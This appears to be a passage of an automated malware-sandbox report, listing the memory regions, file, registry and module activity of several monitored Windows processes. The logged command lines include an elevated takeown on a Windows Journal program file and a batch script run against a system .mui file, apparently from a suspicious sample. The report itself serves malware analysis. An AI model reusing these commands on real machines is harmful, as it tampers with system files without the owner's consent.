|
|
|
- |
| private_0x0000000000260000 | 0x00260000 | 0x0026ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000270000 | 0x00270000 | 0x00270fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000300000 | 0x00300000 | 0x003fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000400000 | 0x00400000 | 0x004fffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000500000 | 0x00500000 | 0x00687fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000690000 | 0x00690000 | 0x00810fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000820000 | 0x00820000 | 0x01c1ffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001c20000 | 0x01c20000 | 0x01d7ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f0a9000 | 0x7f0a9000 | 0x7f0a9fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| vidhs3md64.exe | 0x140000000 | 0x140045fff | Memory Mapped File | rwx |
|
|
|
|
| pagefile_0x00007ff5ffed0000 | 0x7ff5ffed0000 | 0x7ff5fffcffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00007ff5fffd0000 | 0x7ff5fffd0000 | 0x7ff5ffff2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00007ff5ffffa000 | 0x7ff5ffffa000 | 0x7ff5ffffbfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff5ffffc000 | 0x7ff5ffffc000 | 0x7ff5ffffdfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff5ffffe000 | 0x7ff5ffffe000 | 0x7ff5ffffefff | Private Memory | rw |
|
|
|
- |
| comctl32.dll | 0x7ffae5c40000 | 0x7ffae5ce9fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x7ffaeb6f0000 | 0x7ffaeb6f9fff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x7ffaf4440000 | 0x7ffaf4489fff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x7ffaf4490000 | 0x7ffaf44a2fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x7ffaf44d0000 | 0x7ffaf44defff | Memory Mapped File | rwx |
|
|
|
- |
| windows.storage.dll | 0x7ffaf4590000 | 0x7ffaf4bb7fff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x7ffaf4bc0000 | 0x7ffaf4c72fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7ffaf4e50000 | 0x7ffaf502cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x7ffaf5140000 | 0x7ffaf528dfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x7ffaf5290000 | 0x7ffaf53b5fff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x7ffaf53c0000 | 0x7ffaf53f5fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7ffaf5700000 | 0x7ffaf579cfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x7ffaf57a0000 | 0x7ffaf57fafff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7ffaf5800000 | 0x7ffaf5984fff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x7ffaf5990000 | 0x7ffaf6eb4fff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x7ffaf6f70000 | 0x7ffaf70cbfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x7ffaf70d0000 | 0x7ffaf717cfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x7ffaf72e0000 | 0x7ffaf755bfff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x7ffaf75d0000 | 0x7ffaf7675fff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x7ffaf7860000 | 0x7ffaf78b0fff | Memory Mapped File | rwx |
|
|
|
- |
| comdlg32.dll | 0x7ffaf7930000 | 0x7ffaf7a07fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x7ffaf7a10000 | 0x7ffaf7bd1fff | Memory Mapped File | rwx |
|
|
|
- |
Host Behavior
File (18)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | STD_INPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 101 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 44 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 58 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 138 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 85 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 59 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 56 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 69 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 74 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 78 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 72 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 49 |
|
1 |
Registry (7)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create Key | HKEY_CURRENT_USER\Software\Sysinternals\Handle | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Sysinternals | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Sysinternals | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Sysinternals\Handle | - |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Sysinternals | value_name = EulaAccepted, data = 0 |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Sysinternals\Handle | value_name = EulaAccepted, data = 1 |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Sysinternals\Handle | value_name = EulaAccepted, data = 1, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 |
Module (38)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x7ffaf70d0000 |
|
2 | |
| Get Handle | mscoree.dll | - |
|
1 | |
| Get Filename | - | process_name = c:\users\ciihmn~1\appdata\local\temp\vidhs3md64.exe, file_name_orig = C:\Users\CIIHMN~1\AppData\Local\Temp\vIDhS3md64.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | address_out = 0x7ffaf70f02a0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsFree, address_out = 0x7ffaf70f23f0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsGetValue, address_out = 0x7ffaf70e63c0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsSetValue, address_out = 0x7ffaf70ed920 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = InitializeCriticalSectionEx, address_out = 0x7ffaf70f5620 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateEventExW, address_out = 0x7ffaf70f5580 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateSemaphoreExW, address_out = 0x7ffaf70f55e0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadStackGuarantee, address_out = 0x7ffaf70f0e10 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateThreadpoolTimer, address_out = 0x7ffaf70ef110 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadpoolTimer, address_out = 0x7ffaf7a4cb10 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WaitForThreadpoolTimerCallbacks, address_out = 0x7ffaf7a55790 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseThreadpoolTimer, address_out = 0x7ffaf7a4ea10 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateThreadpoolWait, address_out = 0x7ffaf70f28c0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadpoolWait, address_out = 0x7ffaf7a4c470 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseThreadpoolWait, address_out = 0x7ffaf7a55410 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlushProcessWriteBuffers, address_out = 0x7ffaf7aa42f0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FreeLibraryWhenCallbackReturns, address_out = 0x7ffaf7a895e0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetCurrentProcessorNumber, address_out = 0x7ffaf7aa3130 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLogicalProcessorInformation, address_out = 0x7ffaf70f0fb0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateSymbolicLinkW, address_out = 0x7ffaf7112720 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetDefaultDllDirectories, address_out = 0x7ffaf4f0e7a0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = EnumSystemLocalesEx, address_out = 0x7ffaf71128e0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CompareStringEx, address_out = 0x7ffaf70e6010 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetDateFormatEx, address_out = 0x7ffaf7112a00 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLocaleInfoEx, address_out = 0x7ffaf70f0310 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTimeFormatEx, address_out = 0x7ffaf7112bc0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetUserDefaultLocaleName, address_out = 0x7ffaf70f25d0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsValidLocaleName, address_out = 0x7ffaf7112cd0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LCMapStringEx, address_out = 0x7ffaf70e6000 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetCurrentPackageId, address_out = 0x7ffaf4ea45e0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTickCount64, address_out = 0x7ffaf70e65a0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetFileInformationByHandleExW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFileInformationByHandleW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsWow64Process, address_out = 0x7ffaf70ee960 |
|
1 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 |
Process #108: takeown.exe
0
0
| Information | Value |
|---|---|
| ID | #108 |
| File Name | c:\windows\syswow64\takeown.exe |
| Command Line | takeown /F "C:\Program Files\Windows Journal\Journal.exe" |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:04:37, Reason: Child Process |
| Unmonitor | End Time: 00:04:42, Reason: Self Terminated |
| Monitor Duration | 00:00:05 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x71c |
| Parent PID | 0xeac (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
5B0
0x
278
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| takeown.exe | 0x00170000 | 0x0017ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x00000000009f0000 | 0x009f0000 | 0x049effff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x00000000049f0000 | 0x049f0000 | 0x04a0ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000049f0000 | 0x049f0000 | 0x049fffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000004a00000 | 0x04a00000 | 0x04a03fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004a10000 | 0x04a10000 | 0x04a11fff | Private Memory | rw |
|
|
|
- |
| takeown.exe.mui | 0x04a10000 | 0x04a14fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000004a20000 | 0x04a20000 | 0x04a33fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004a40000 | 0x04a40000 | 0x04a7ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004a80000 | 0x04a80000 | 0x04abffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004ac0000 | 0x04ac0000 | 0x04ac3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000004ad0000 | 0x04ad0000 | 0x04ad0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004ae0000 | 0x04ae0000 | 0x04ae1fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004af0000 | 0x04af0000 | 0x04b2ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004b30000 | 0x04b30000 | 0x04b30fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004b40000 | 0x04b40000 | 0x04b4ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004b50000 | 0x04b50000 | 0x04ceffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004b50000 | 0x04b50000 | 0x04b8ffff | Private Memory | rw |
|
|
|
- |
| imm32.dll | 0x04b90000 | 0x04bb9fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000004b90000 | 0x04b90000 | 0x04b90fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004bf0000 | 0x04bf0000 | 0x04ceffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x04cf0000 | 0x04dadfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000004db0000 | 0x04db0000 | 0x04e1ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004e20000 | 0x04e20000 | 0x04fa7fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000004fb0000 | 0x04fb0000 | 0x05130fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000005140000 | 0x05140000 | 0x0653ffff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x06540000 | 0x06876fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x73030000 | 0x73037fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x73040000 | 0x7308efff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x73090000 | 0x73102fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x745d0000 | 0x745d7fff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x74650000 | 0x74677fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74a30000 | 0x74a88fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74a90000 | 0x74a99fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74aa0000 | 0x74abdfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x74ad0000 | 0x74c0ffff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x74c10000 | 0x74c53fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x74c60000 | 0x74cdafff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74d30000 | 0x74ea5fff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x74f70000 | 0x75129fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75130000 | 0x7521ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75220000 | 0x7524afff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x76da0000 | 0x76ebffff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x770b0000 | 0x770f2fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x772c0000 | 0x7736bfff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x77370000 | 0x774bcfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x778d0000 | 0x7798dfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77990000 | 0x77b08fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007e9c0000 | 0x7e9c0000 | 0x7eabffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007eac0000 | 0x7eac0000 | 0x7eae2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007eae8000 | 0x7eae8000 | 0x7eaeafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007eaeb000 | 0x7eaeb000 | 0x7eaebfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007eaec000 | 0x7eaec000 | 0x7eaeefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007eaef000 | 0x7eaef000 | 0x7eaeffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfaf7a0ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfaf7a10000 | 0x7dfaf7a10000 | 0x7ffaf7a0ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffaf7a10000 | 0x7ffaf7bd1fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffaf7bd2000 | 0x7ffaf7bd2000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #109: cmd.exe
290
0
| Information | Value |
|---|---|
| ID | #109 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | C:\Windows\system32\cmd.exe /c ""C:\Users\CIiHmnxMn6Ps\Desktop\vRnqNMBW.bat" "C:\Program Files\Windows Journal\en-US\MSPVWCTL.DLL.mui"" |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:04:38, Reason: Child Process |
| Unmonitor | End Time: 00:05:01, Reason: Terminated by Timeout |
| Monitor Duration | 00:00:23 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xdfc |
| Parent PID | 0xbd0 (c:\users\ciihmnxmn6ps\desktop\current_dirnwovkcyl.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
324
0x
FA0
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000880000 | 0x00880000 | 0x0089ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000880000 | 0x00880000 | 0x0088ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000890000 | 0x00890000 | 0x00893fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000008a0000 | 0x008a0000 | 0x008a1fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000008a0000 | 0x008a0000 | 0x008a3fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000008b0000 | 0x008b0000 | 0x008c3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000008d0000 | 0x008d0000 | 0x0090ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000910000 | 0x00910000 | 0x00a0ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000a10000 | 0x00a10000 | 0x00a13fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000a20000 | 0x00a20000 | 0x00a20fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000a30000 | 0x00a30000 | 0x00a31fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00a40000 | 0x00afdfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000b00000 | 0x00b00000 | 0x00b3ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000b40000 | 0x00b40000 | 0x00b4ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000c10000 | 0x00c10000 | 0x00c1ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000c20000 | 0x00c20000 | 0x00edffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000c20000 | 0x00c20000 | 0x00d1ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000de0000 | 0x00de0000 | 0x00edffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000ee0000 | 0x00ee0000 | 0x00fdffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x00fe0000 | 0x01316fff | Memory Mapped File | r |
|
|
|
- |
| cmd.exe | 0x013d0000 | 0x0141ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000001420000 | 0x01420000 | 0x0541ffff | Pagefile Backed Memory | - |
|
|
|
- |
| wow64cpu.dll | 0x73030000 | 0x73037fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x73040000 | 0x7308efff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x73090000 | 0x73102fff | Memory Mapped File | rwx |
|
|
|
- |
| cmdext.dll | 0x74540000 | 0x74547fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74a30000 | 0x74a88fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74a90000 | 0x74a99fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74aa0000 | 0x74abdfff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x74c60000 | 0x74cdafff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74d30000 | 0x74ea5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75130000 | 0x7521ffff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x770b0000 | 0x770f2fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x772c0000 | 0x7736bfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x778d0000 | 0x7798dfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77990000 | 0x77b08fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f190000 | 0x7f190000 | 0x7f28ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007f290000 | 0x7f290000 | 0x7f2b2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f2b7000 | 0x7f2b7000 | 0x7f2b7fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f2b8000 | 0x7f2b8000 | 0x7f2bafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f2bb000 | 0x7f2bb000 | 0x7f2bdfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f2be000 | 0x7f2be000 | 0x7f2befff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfaf7a0ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfaf7a10000 | 0x7dfaf7a10000 | 0x7ffaf7a0ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffaf7a10000 | 0x7ffaf7bd1fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffaf7bd2000 | 0x7ffaf7bd2000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (217)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\vRnqNMBW.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\vRnqNMBW.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\vRnqNMBW.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop | type = file_attributes |
|
4 | |
| Get Info | "C:\Users\CIiHmnxMn6Ps\Desktop\vRnqNMBW.bat" | type = file_attributes |
|
1 | |
| Get Info | - | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
32 | |
| Get Info | - | type = file_type |
|
1 | |
| Get Info | - | type = file_type |
|
3 | |
| Open | STD_OUTPUT_HANDLE | - |
|
107 | |
| Open | STD_INPUT_HANDLE | - |
|
6 | |
| Open | - | - |
|
4 | |
| Open | - | - |
|
4 | |
| Open | - | - |
|
12 | |
| Read | - | size = 8191, size_out = 226 |
|
1 | |
| Read | - | size = 8191, size_out = 194 |
|
1 | |
| Read | - | size = 8191, size_out = 179 |
|
1 | |
| Read | - | size = 8191, size_out = 163 |
|
1 | |
| Read | - | size = 8191, size_out = 148 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 2 |
|
12 | |
| Write | STD_OUTPUT_HANDLE | size = 30 |
|
5 | |
| Write | STD_OUTPUT_HANDLE | size = 5 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 83 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 7 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 62 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 3 |
|
3 | |
| Write | STD_OUTPUT_HANDLE | size = 23 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 37 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 32 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 61 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 1 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 12 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 38 |
|
1 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 86, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
